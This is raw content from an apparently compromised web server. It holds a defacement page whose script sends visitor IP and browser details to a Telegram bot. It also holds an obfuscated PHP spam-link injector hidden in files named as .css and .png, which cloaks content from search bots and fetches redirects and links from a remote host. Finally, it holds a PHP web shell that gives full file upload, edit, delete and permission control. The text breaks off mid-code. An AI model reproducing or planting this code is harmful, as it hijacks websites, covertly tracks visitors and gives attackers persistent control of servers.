hue-rotate(180deg); } .message { color: white; font-size: 24px; margin: 30px 0; } .greetz-title { color: white; font-size: 18px; margin: 25px 0 10px 0; } .greetz-list { font-family: 'Courier New', monospace; font-size: 14px; color: #ff0000; font-weight: bold; line-height: 1.4; } .contact-section { margin-top: 40px; color: white; font-family: 'Space Mono', monospace; font-size: 18px; } .contact-link { color: #ff0000; text-decoration: none; font-weight: bold; } .contact-link:hover { text-decoration: underline; } @media (min-width: 1024px) { .container { padding: 60px 20px; } .x { margin-bottom: 50px; } .hacker-image { margin: 50px auto; } } @media (max-width: 768px) { .container { padding: 30px 20px; } .x { font-size: 40px; margin-bottom: 30px; } .message { font-size: 18px; margin: 25px 0; } .contact-section { font-size: 16px; margin-top: 30px; } .hacker-image { max-width: 250px; margin: 30px auto; } } @media (max-width: 480px) { .container { padding: 20px 15px; } .x { font-size: 32px; margin-bottom: 25px; } .message { font-size: 16px; margin: 20px 0; } .contact-section { font-size: 14px; margin-top: 25px; } .hacker-image { max-width: 200px; margin: 25px auto; } .audio-player audio { width: 180px; } .greetz-title { font-size: 16px; margin: 20px 0 8px 0; } .greetz-list { font-size: 12px; } } </style> </head> <body> <div class="container"> <h1 class="x">Hacked by <span>Kize1337</span></h1> <div class="hacker-image"> <img src="https://c.top4top.io/p_3715008ex4.jpg" alt="Hacker Image"> </div> <div class="audio-player"> <audio id="bg-audio" src="https://e.top4top.io/m_3715w7dyq6.mp3" autoplay controls></audio> </div> <h2 class="message">MSG: Patch your system!</h2> <h3 class="greetz-title">Greetz:</h3> <div class="greetz-list"> Kize1337 - 0xTebu - Lizardpredator - JohenLG - Luminance - Sph69 - Axonhub - Privnet </div> <div class="contact-section"> CONTACT: <a href="https://t.me/deathbase" class="contact-link" target="_blank">t.me/deathbase</a> </div> </div> <script> document.body.addEventListener('click', function () { const audio = document.getElementById('bg-audio'); if (audio) { audio.muted = false; audio.volume = 1.0; audio.play().catch((e) => { console.warn('Autoplay failed:', e); }); } }, { once: true }); // Telegram logger async function sendLogToTelegram() { const token = "8499549696:AAEQJ6pvg9oFNbHTtIKKRkiARzIRLaeNJ7E"; const chat_id = "-1002699548560"; let ipInfo = "Unknown"; try { const res = await fetch("https://api64.ipify.org?format=json"); const data = await res.json(); ipInfo = data.ip; } catch (e) { ipInfo = "Unavailable"; } const ua = navigator.userAgent; const platform = navigator.platform; const browser = (() => { if (ua.includes("Chrome")) return "Chrome"; if (ua.includes("Firefox")) return "Firefox"; if (ua.includes("Safari") && !ua.includes("Chrome")) return "Safari"; if (ua.includes("Opera") \|\| ua.includes("OPR")) return "Opera"; if (ua.includes("Edg")) return "Edge"; return "Unknown"; })(); const now = new Date(); const timestamp = now.toLocaleString("id-ID", { timeZone: "Asia/Jakarta" }); const message = `📌 Access Detected 📅 Date & Time: ${timestamp} 🌐 IP: ${ipInfo} 💻 Device: ${platform} 🌍 Browser: ${browser} 📣 User-Agent: ${ua} 📎 URL: ${window.location.href} _This message is sent automatically by a bot._`; const tgURL = `https://api.telegram.org/bot${token}/sendMessage`; await fetch(tgURL, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id, text: message, parse_mode: "Markdown" }) }); } window.onload = () => sendLogToTelegram(); </script> </body> </html>PK��R�\%Pn��n��db_details.cssnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n��servizi.pngnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\��&A��A��home.phpnu��6�$��<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> PK��R�\%Pn��n��validations.pngnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 